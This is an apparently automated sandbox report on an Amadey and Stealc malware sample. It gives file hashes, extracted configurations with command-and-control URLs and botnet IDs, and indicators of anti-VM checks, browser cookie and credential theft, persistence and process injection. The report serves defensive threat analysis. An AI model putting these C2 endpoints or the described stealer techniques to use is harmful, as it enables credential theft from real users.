amadey | b3fdbd0e34f2c77b939ae739da0fcad5dd2c3385d6ecd4e59fbf0c694d121944

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20250211-en
resource tags

arch:x64arch:x86image:win10v2004-20250211-enlocale:en-usos:windows10-2004-x64system
submitted
11/02/2025, 22:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b3fdbd0e34f2c77b939ae739da0fcad5dd2c3385d6ecd4e59fbf0c694d121944.exe
Size

5.5MB
MD5

be5397f3b0bde8d16067fdccff9cc387
SHA1

904f4ac82cb0748bd6416196d58c87c06eac1fec
SHA256

b3fdbd0e34f2c77b939ae739da0fcad5dd2c3385d6ecd4e59fbf0c694d121944
SHA512

076ca3fc19706d8a701ee43805f65c2e81acdfcbb6eb35445cdb8fd6a2d8e81aecc35446d7124de3b286a1cce76b43b589ea84eb093c3fe17eecc792c2cebd6b
SSDEEP

98304:l2DztHRUIE0Orvb60fnOpmcP3WLJwAQo8MUgKAT9jsaFTL:oDztH6IcrzjxcfWLSQXvxBsa

Score

10^/10

amadey stealc 9c9aa5 reno credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer trojan upx

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

http://185.215.113.43

Attributes

install_dir
abc3bc1985
install_file
skotes.exe
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
url_paths
/Zu7JuNko/index.php

rc4.plain

Extracted

Family

stealc

Botnet

reno

http://185.215.113.115

Attributes

url_path
/c4becf79229cb002.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2z0787.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	G4U5LL9FQR9AW5P9DYERDF1XLOI9D.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	3E61p.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1k77o9.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	II7QTU1Q7Z0YTKGI.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	482ec4200b.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe

Blocklisted process makes network request 4 IoCs

flow	pid	Process
86	404	powershell.exe
89	404	powershell.exe
90	404	powershell.exe
91	404	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3968	powershell.exe
2084	powershell.exe

Downloads MZ/PE file 7 IoCs

flow	pid	Process
36	3048	futors.exe
77	2036	G4U5LL9FQR9AW5P9DYERDF1XLOI9D.exe
19	3744	skotes.exe
19	3744	skotes.exe
19	3744	skotes.exe
27	1192	2z0787.exe
33	3744	skotes.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

defense_evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
3672	netsh.exe

Uses browser remote debugging 2 TTPs 15 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
4052	chrome.exe
1836	chrome.exe
3428	chrome.exe
408	msedge.exe
3640	msedge.exe
3784	chrome.exe
3504	msedge.exe
2872	chrome.exe
3000	msedge.exe
2868	msedge.exe
4224	chrome.exe
5040	msedge.exe
2148	msedge.exe
4340	msedge.exe
4740	msedge.exe

.NET Reactor proctector 2 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral1/files/0x0007000000023ddc-281.dat	net_reactor
behavioral1/memory/740-312-0x00000000003F0000-0x00000000004D8000-memory.dmp	net_reactor

Checks BIOS information in registry 2 TTPs 20 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	G4U5LL9FQR9AW5P9DYERDF1XLOI9D.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3E61p.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3E61p.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1k77o9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1k77o9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2z0787.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2z0787.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	482ec4200b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	482ec4200b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	G4U5LL9FQR9AW5P9DYERDF1XLOI9D.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	II7QTU1Q7Z0YTKGI.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	II7QTU1Q7Z0YTKGI.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1318997816-2171176372-1451785247-1000\Control Panel\International\Geo\Nation	futors.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1318997816-2171176372-1451785247-1000\Control Panel\International\Geo\Nation	1k77o9.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1318997816-2171176372-1451785247-1000\Control Panel\International\Geo\Nation	skotes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1318997816-2171176372-1451785247-1000\Control Panel\International\Geo\Nation	amnew.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat	powershell.exe

Executes dropped EXE 19 IoCs

pid	Process
2176	t3k24.exe
4648	1k77o9.exe
3744	skotes.exe
1192	2z0787.exe
4292	skotes.exe
1860	BwStzYG.exe
2036	G4U5LL9FQR9AW5P9DYERDF1XLOI9D.exe
3564	Ubrlj6S.exe
4296	skotes.exe
3440	amnew.exe
3048	futors.exe
4032	BwStzYG.exe
3244	II7QTU1Q7Z0YTKGI.exe
3660	3E61p.exe
740	PNYmoTn.exe
3992	PNYmoTn.exe
1468	skotes.exe
4308	futors.exe
2892	482ec4200b.exe

Identifies Wine through registry keys 2 TTPs 10 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1318997816-2171176372-1451785247-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1318997816-2171176372-1451785247-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1318997816-2171176372-1451785247-1000\Software\Wine	II7QTU1Q7Z0YTKGI.exe
Key opened	\REGISTRY\USER\S-1-5-21-1318997816-2171176372-1451785247-1000\Software\Wine	3E61p.exe
Key opened	\REGISTRY\USER\S-1-5-21-1318997816-2171176372-1451785247-1000\Software\Wine	1k77o9.exe
Key opened	\REGISTRY\USER\S-1-5-21-1318997816-2171176372-1451785247-1000\Software\Wine	2z0787.exe
Key opened	\REGISTRY\USER\S-1-5-21-1318997816-2171176372-1451785247-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1318997816-2171176372-1451785247-1000\Software\Wine	482ec4200b.exe
Key opened	\REGISTRY\USER\S-1-5-21-1318997816-2171176372-1451785247-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1318997816-2171176372-1451785247-1000\Software\Wine	G4U5LL9FQR9AW5P9DYERDF1XLOI9D.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	b3fdbd0e34f2c77b939ae739da0fcad5dd2c3385d6ecd4e59fbf0c694d121944.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	t3k24.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\F:	Ubrlj6S.exe

Enumerates processes with tasklist 1 TTPs 34 IoCs

discovery

Process Discovery

T1057

pid	Process
2824	tasklist.exe
2940	tasklist.exe
4404	tasklist.exe
2692	tasklist.exe
1072	tasklist.exe
3060	tasklist.exe
2372	tasklist.exe
2560	tasklist.exe
3936	tasklist.exe
4344	tasklist.exe
728	tasklist.exe
4468	tasklist.exe
2148	tasklist.exe
4908	tasklist.exe
452	tasklist.exe
516	tasklist.exe
2156	tasklist.exe
3636	tasklist.exe
1276	tasklist.exe
940	tasklist.exe
3992	tasklist.exe
4652	tasklist.exe
4168	tasklist.exe
2104	tasklist.exe
4440	tasklist.exe
1280	tasklist.exe
2872	tasklist.exe
4228	tasklist.exe
4132	tasklist.exe
3324	tasklist.exe
4240	tasklist.exe
4520	tasklist.exe
2496	tasklist.exe
988	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs

pid	Process
4648	1k77o9.exe
3744	skotes.exe
1192	2z0787.exe
4292	skotes.exe
2036	G4U5LL9FQR9AW5P9DYERDF1XLOI9D.exe
4296	skotes.exe
3244	II7QTU1Q7Z0YTKGI.exe
3660	3E61p.exe
1468	skotes.exe
2892	482ec4200b.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 740 set thread context of 3992	740	PNYmoTn.exe	209

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0008000000023db2-82.dat	upx
behavioral1/memory/3564-96-0x00007FF7BCB10000-0x00007FF7BD331000-memory.dmp	upx
behavioral1/memory/3564-163-0x00007FF7BCB10000-0x00007FF7BD331000-memory.dmp	upx
behavioral1/memory/3564-189-0x00007FF7BCB10000-0x00007FF7BD331000-memory.dmp	upx
behavioral1/memory/3564-215-0x00007FF7BCB10000-0x00007FF7BD331000-memory.dmp	upx
behavioral1/memory/3564-264-0x00007FF7BCB10000-0x00007FF7BD331000-memory.dmp	upx

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\skotes.job	1k77o9.exe
File created	C:\Windows\Tasks\futors.job	amnew.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
848	740	WerFault.exe	208

System Location Discovery: System Language Discovery 1 TTPs 18 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3E61p.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	482ec4200b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1k77o9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	amnew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	futors.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PNYmoTn.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PNYmoTn.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	skotes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2z0787.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	G4U5LL9FQR9AW5P9DYERDF1XLOI9D.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	II7QTU1Q7Z0YTKGI.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b3fdbd0e34f2c77b939ae739da0fcad5dd2c3385d6ecd4e59fbf0c694d121944.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	t3k24.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	G4U5LL9FQR9AW5P9DYERDF1XLOI9D.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	G4U5LL9FQR9AW5P9DYERDF1XLOI9D.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3024	wmic.exe

Enumerates system info in registry 2 TTPs 8 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Kills process with taskkill 2 IoCs

defense_evasion

pid	Process
988	taskkill.exe
1360	taskkill.exe

Modifies data under HKEY_USERS 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4648	1k77o9.exe
4648	1k77o9.exe
3744	skotes.exe
3744	skotes.exe
1192	2z0787.exe
1192	2z0787.exe
4292	skotes.exe
4292	skotes.exe
1192	2z0787.exe
1192	2z0787.exe
1192	2z0787.exe
1192	2z0787.exe
2036	G4U5LL9FQR9AW5P9DYERDF1XLOI9D.exe
2036	G4U5LL9FQR9AW5P9DYERDF1XLOI9D.exe
2036	G4U5LL9FQR9AW5P9DYERDF1XLOI9D.exe
2036	G4U5LL9FQR9AW5P9DYERDF1XLOI9D.exe
4296	skotes.exe
4296	skotes.exe
3244	II7QTU1Q7Z0YTKGI.exe
3244	II7QTU1Q7Z0YTKGI.exe
3660	3E61p.exe
3660	3E61p.exe
4600	msedge.exe
4600	msedge.exe
3564	Ubrlj6S.exe
3564	Ubrlj6S.exe
3564	Ubrlj6S.exe
3564	Ubrlj6S.exe
3564	Ubrlj6S.exe
3564	Ubrlj6S.exe
2036	G4U5LL9FQR9AW5P9DYERDF1XLOI9D.exe
2036	G4U5LL9FQR9AW5P9DYERDF1XLOI9D.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
2036	G4U5LL9FQR9AW5P9DYERDF1XLOI9D.exe
2036	G4U5LL9FQR9AW5P9DYERDF1XLOI9D.exe
2036	G4U5LL9FQR9AW5P9DYERDF1XLOI9D.exe
2036	G4U5LL9FQR9AW5P9DYERDF1XLOI9D.exe
4092	msedge.exe
4092	msedge.exe
2868	msedge.exe
2868	msedge.exe
1712	identity_helper.exe
1712	identity_helper.exe
1168	msedge.exe
1168	msedge.exe
1168	msedge.exe
1168	msedge.exe
2036	G4U5LL9FQR9AW5P9DYERDF1XLOI9D.exe
2036	G4U5LL9FQR9AW5P9DYERDF1XLOI9D.exe
3992	PNYmoTn.exe
3992	PNYmoTn.exe
3992	PNYmoTn.exe
3992	PNYmoTn.exe
1468	skotes.exe
1468	skotes.exe
3968	powershell.exe
3968	powershell.exe
3968	powershell.exe
404	powershell.exe
404	powershell.exe
404	powershell.exe
2084	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs

pid	Process
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
2868	msedge.exe
2868	msedge.exe
2868	msedge.exe
2868	msedge.exe
2868	msedge.exe
2868	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2560	tasklist.exe
Token: SeDebugPrivilege	2692	tasklist.exe
Token: SeDebugPrivilege	2156	tasklist.exe
Token: SeDebugPrivilege	4168	tasklist.exe
Token: SeDebugPrivilege	2148	tasklist.exe
Token: SeDebugPrivilege	3324	tasklist.exe
Token: SeDebugPrivilege	2104	tasklist.exe
Token: SeDebugPrivilege	4440	tasklist.exe
Token: SeDebugPrivilege	988	tasklist.exe
Token: SeDebugPrivilege	4468	tasklist.exe
Token: SeDebugPrivilege	940	tasklist.exe
Token: SeDebugPrivilege	4908	tasklist.exe
Token: SeDebugPrivilege	452	tasklist.exe
Token: SeDebugPrivilege	4240	tasklist.exe
Token: SeDebugPrivilege	1276	tasklist.exe
Token: SeDebugPrivilege	1280	tasklist.exe
Token: SeDebugPrivilege	988	taskkill.exe
Token: SeDebugPrivilege	3636	tasklist.exe
Token: SeDebugPrivilege	4520	tasklist.exe
Token: SeShutdownPrivilege	3784	chrome.exe
Token: SeCreatePagefilePrivilege	3784	chrome.exe
Token: SeShutdownPrivilege	3784	chrome.exe
Token: SeCreatePagefilePrivilege	3784	chrome.exe
Token: SeShutdownPrivilege	3784	chrome.exe
Token: SeCreatePagefilePrivilege	3784	chrome.exe
Token: SeShutdownPrivilege	3784	chrome.exe
Token: SeCreatePagefilePrivilege	3784	chrome.exe
Token: SeShutdownPrivilege	3784	chrome.exe
Token: SeCreatePagefilePrivilege	3784	chrome.exe
Token: SeShutdownPrivilege	3784	chrome.exe
Token: SeCreatePagefilePrivilege	3784	chrome.exe
Token: SeShutdownPrivilege	3784	chrome.exe
Token: SeCreatePagefilePrivilege	3784	chrome.exe
Token: SeDebugPrivilege	1072	tasklist.exe
Token: SeDebugPrivilege	1360	taskkill.exe
Token: SeShutdownPrivilege	3784	chrome.exe
Token: SeCreatePagefilePrivilege	3784	chrome.exe
Token: SeDebugPrivilege	2496	tasklist.exe
Token: SeShutdownPrivilege	3784	chrome.exe
Token: SeCreatePagefilePrivilege	3784	chrome.exe
Token: SeDebugPrivilege	3992	tasklist.exe
Token: SeDebugPrivilege	2872	tasklist.exe
Token: SeDebugPrivilege	4404	tasklist.exe
Token: SeDebugPrivilege	516	tasklist.exe
Token: SeDebugPrivilege	4228	tasklist.exe
Token: SeShutdownPrivilege	3784	chrome.exe
Token: SeCreatePagefilePrivilege	3784	chrome.exe
Token: SeDebugPrivilege	3936	tasklist.exe
Token: SeDebugPrivilege	4132	tasklist.exe
Token: SeDebugPrivilege	4652	tasklist.exe
Token: SeDebugPrivilege	3060	tasklist.exe
Token: SeDebugPrivilege	4344	tasklist.exe
Token: SeShutdownPrivilege	3784	chrome.exe
Token: SeCreatePagefilePrivilege	3784	chrome.exe
Token: SeDebugPrivilege	728	tasklist.exe
Token: SeDebugPrivilege	2372	tasklist.exe
Token: SeDebugPrivilege	2824	tasklist.exe
Token: SeDebugPrivilege	2940	tasklist.exe
Token: SeShutdownPrivilege	3784	chrome.exe
Token: SeCreatePagefilePrivilege	3784	chrome.exe
Token: SeIncreaseQuotaPrivilege	3024	wmic.exe
Token: SeSecurityPrivilege	3024	wmic.exe
Token: SeTakeOwnershipPrivilege	3024	wmic.exe
Token: SeLoadDriverPrivilege	3024	wmic.exe

Suspicious use of FindShellTrayWindow 52 IoCs

pid	Process
4648	1k77o9.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
4052	chrome.exe
2868	msedge.exe
2868	msedge.exe
2868	msedge.exe
2868	msedge.exe
2868	msedge.exe
2868	msedge.exe
2868	msedge.exe
2868	msedge.exe
2868	msedge.exe
2868	msedge.exe
2868	msedge.exe
2868	msedge.exe
2868	msedge.exe
2868	msedge.exe
2868	msedge.exe
2868	msedge.exe
2868	msedge.exe
2868	msedge.exe
2868	msedge.exe
2868	msedge.exe
2868	msedge.exe
2868	msedge.exe
2868	msedge.exe
2868	msedge.exe
2868	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4616 wrote to memory of 2176	4616	b3fdbd0e34f2c77b939ae739da0fcad5dd2c3385d6ecd4e59fbf0c694d121944.exe	84
PID 4616 wrote to memory of 2176	4616	b3fdbd0e34f2c77b939ae739da0fcad5dd2c3385d6ecd4e59fbf0c694d121944.exe	84
PID 4616 wrote to memory of 2176	4616	b3fdbd0e34f2c77b939ae739da0fcad5dd2c3385d6ecd4e59fbf0c694d121944.exe	84
PID 2176 wrote to memory of 4648	2176	t3k24.exe	87
PID 2176 wrote to memory of 4648	2176	t3k24.exe	87
PID 2176 wrote to memory of 4648	2176	t3k24.exe	87
PID 4648 wrote to memory of 3744	4648	1k77o9.exe	89
PID 4648 wrote to memory of 3744	4648	1k77o9.exe	89
PID 4648 wrote to memory of 3744	4648	1k77o9.exe	89
PID 2176 wrote to memory of 1192	2176	t3k24.exe	90
PID 2176 wrote to memory of 1192	2176	t3k24.exe	90
PID 2176 wrote to memory of 1192	2176	t3k24.exe	90
PID 3744 wrote to memory of 1860	3744	skotes.exe	93
PID 3744 wrote to memory of 1860	3744	skotes.exe	93
PID 1192 wrote to memory of 2036	1192	2z0787.exe	94
PID 1192 wrote to memory of 2036	1192	2z0787.exe	94
PID 1192 wrote to memory of 2036	1192	2z0787.exe	94
PID 3744 wrote to memory of 3564	3744	skotes.exe	96
PID 3744 wrote to memory of 3564	3744	skotes.exe	96
PID 3564 wrote to memory of 2560	3564	Ubrlj6S.exe	97
PID 3564 wrote to memory of 2560	3564	Ubrlj6S.exe	97
PID 3564 wrote to memory of 2692	3564	Ubrlj6S.exe	100
PID 3564 wrote to memory of 2692	3564	Ubrlj6S.exe	100
PID 3564 wrote to memory of 2156	3564	Ubrlj6S.exe	102
PID 3564 wrote to memory of 2156	3564	Ubrlj6S.exe	102
PID 3564 wrote to memory of 4168	3564	Ubrlj6S.exe	104
PID 3564 wrote to memory of 4168	3564	Ubrlj6S.exe	104
PID 3564 wrote to memory of 2148	3564	Ubrlj6S.exe	106
PID 3564 wrote to memory of 2148	3564	Ubrlj6S.exe	106
PID 3564 wrote to memory of 3324	3564	Ubrlj6S.exe	108
PID 3564 wrote to memory of 3324	3564	Ubrlj6S.exe	108
PID 3564 wrote to memory of 2104	3564	Ubrlj6S.exe	110
PID 3564 wrote to memory of 2104	3564	Ubrlj6S.exe	110
PID 3564 wrote to memory of 4440	3564	Ubrlj6S.exe	112
PID 3564 wrote to memory of 4440	3564	Ubrlj6S.exe	112
PID 3564 wrote to memory of 988	3564	Ubrlj6S.exe	114
PID 3564 wrote to memory of 988	3564	Ubrlj6S.exe	114
PID 3564 wrote to memory of 4468	3564	Ubrlj6S.exe	116
PID 3564 wrote to memory of 4468	3564	Ubrlj6S.exe	116
PID 3564 wrote to memory of 940	3564	Ubrlj6S.exe	118
PID 3564 wrote to memory of 940	3564	Ubrlj6S.exe	118
PID 3564 wrote to memory of 4908	3564	Ubrlj6S.exe	120
PID 3564 wrote to memory of 4908	3564	Ubrlj6S.exe	120
PID 3564 wrote to memory of 452	3564	Ubrlj6S.exe	122
PID 3564 wrote to memory of 452	3564	Ubrlj6S.exe	122
PID 3564 wrote to memory of 4240	3564	Ubrlj6S.exe	124
PID 3564 wrote to memory of 4240	3564	Ubrlj6S.exe	124
PID 3564 wrote to memory of 1276	3564	Ubrlj6S.exe	126
PID 3564 wrote to memory of 1276	3564	Ubrlj6S.exe	126
PID 3564 wrote to memory of 1280	3564	Ubrlj6S.exe	128
PID 3564 wrote to memory of 1280	3564	Ubrlj6S.exe	128
PID 3744 wrote to memory of 3440	3744	skotes.exe	130
PID 3744 wrote to memory of 3440	3744	skotes.exe	130
PID 3744 wrote to memory of 3440	3744	skotes.exe	130
PID 3440 wrote to memory of 3048	3440	amnew.exe	131
PID 3440 wrote to memory of 3048	3440	amnew.exe	131
